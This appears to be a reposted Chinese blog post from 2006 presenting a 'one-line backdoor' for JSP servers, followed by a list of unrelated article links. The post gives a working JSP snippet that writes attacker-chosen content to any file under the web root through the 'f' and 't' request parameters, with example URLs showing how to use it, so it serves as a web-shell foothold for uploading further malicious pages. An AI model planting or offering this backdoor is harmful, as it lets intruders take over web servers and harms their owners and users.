当前位置: 首页 > news >正文

JSP一句话后门--2006-08-03

news 来源:原创 2024/5/7 0:25:41

...之前的原创都给人家抬走了!真郁闷.这次 在这里说明~  [转载请注名 無名氏nonamed 作品]

java是 面向对象编程的语言了! 啥都是对象!基于编译与解析之间~~-_- ... 估计没有eval  execute这样功能的函数了!...但是还是可以留一句话后门的 本来我想用反射实现 像 eval这样的功能.....但是失败了!郁闷!

后来没有办法~~ 算了~~ 这样实现吧!

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

这个 后门估计不用我说了吧! 还是提示一下咯!保存为1.jsp 提交url

http://localhost/1.jsp?f=1.txt&t=hello

然后

http://localhost/1.txt 就出来了 内容为 hello .....

 

相关文章:

  • Linux实用命令工具-dtrx根据需要自动解压
  • SQL Server 2005-如何在SQL Server用户自订函数中调用GetDate()函数
  • Linux下C程序的编辑,编译和运行以及调试
  • SharePoint Server 2007 Web内容管理中的几个关键概念
  • 带外监控
  • 自动内容滚动条[WinForm控件]
  • C# 生成二维码
  • CSS在ASP.NET中使用
  • 字符填充的首尾定界符法
  • hdfs源码解析
  • 使用数学函数查询
  • 关于柔性数组
  • 【Vegas原创】sendkeys实例
  • 【原创】PostgreSQL 实现MySQL insert ignore 语法。
  • 闲话网名(一)
  • “大数据应用场景”之隔壁老王(连载四)
  • Angularjs之国际化
  • co模块的前端实现
  • ES2017异步函数现已正式可用
  • extjs4学习之配置
  • gitlab-ci配置详解(一)
  • Iterator 和 for...of 循环
  • JAVA SE 6 GC调优笔记
  • Mac 鼠须管 Rime 输入法 安装五笔输入法 教程
  • Python十分钟制作属于你自己的个性logo
  • Rancher如何对接Ceph-RBD块存储
  • Sequelize 中文文档 v4 - Getting started - 入门
  • vue--为什么data属性必须是一个函数
  • 包装类对象
  • 闭包--闭包作用之保存(一)
  • 初识MongoDB分片
  • 飞驰在Mesos的涡轮引擎上
  • 前端之React实战:创建跨平台的项目架构
  • 适配mpvue平台的的微信小程序日历组件mpvue-calendar
  • 限制Java线程池运行线程以及等待线程数量的策略
  • 译有关态射的一切
  • 积累各种好的链接
  • ​MySQL主从复制一致性检测
  • ​总结MySQL 的一些知识点:MySQL 选择数据库​
  • !$boo在php中什么意思,php前戏
  • #Linux(权限管理)
  • $con= MySQL有关填空题_2015年计算机二级考试《MySQL》提高练习题(10)
  • (1)STL算法之遍历容器
  • (1/2) 为了理解 UWP 的启动流程,我从零开始创建了一个 UWP 程序
  • (70min)字节暑假实习二面(已挂)
  • (done) ROC曲线 和 AUC值 分别是什么?
  • (Java岗)秋招打卡!一本学历拿下美团、阿里、快手、米哈游offer
  • (二十三)Flask之高频面试点
  • (附源码)ssm本科教学合格评估管理系统 毕业设计 180916
  • (附源码)ssm捐赠救助系统 毕业设计 060945
  • (九)One-Wire总线-DS18B20
  • ... 是什么 ?... 有什么用处?
  • .NET CORE 第一节 创建基本的 asp.net core
  • .Net FrameWork总结
  • .Net mvc总结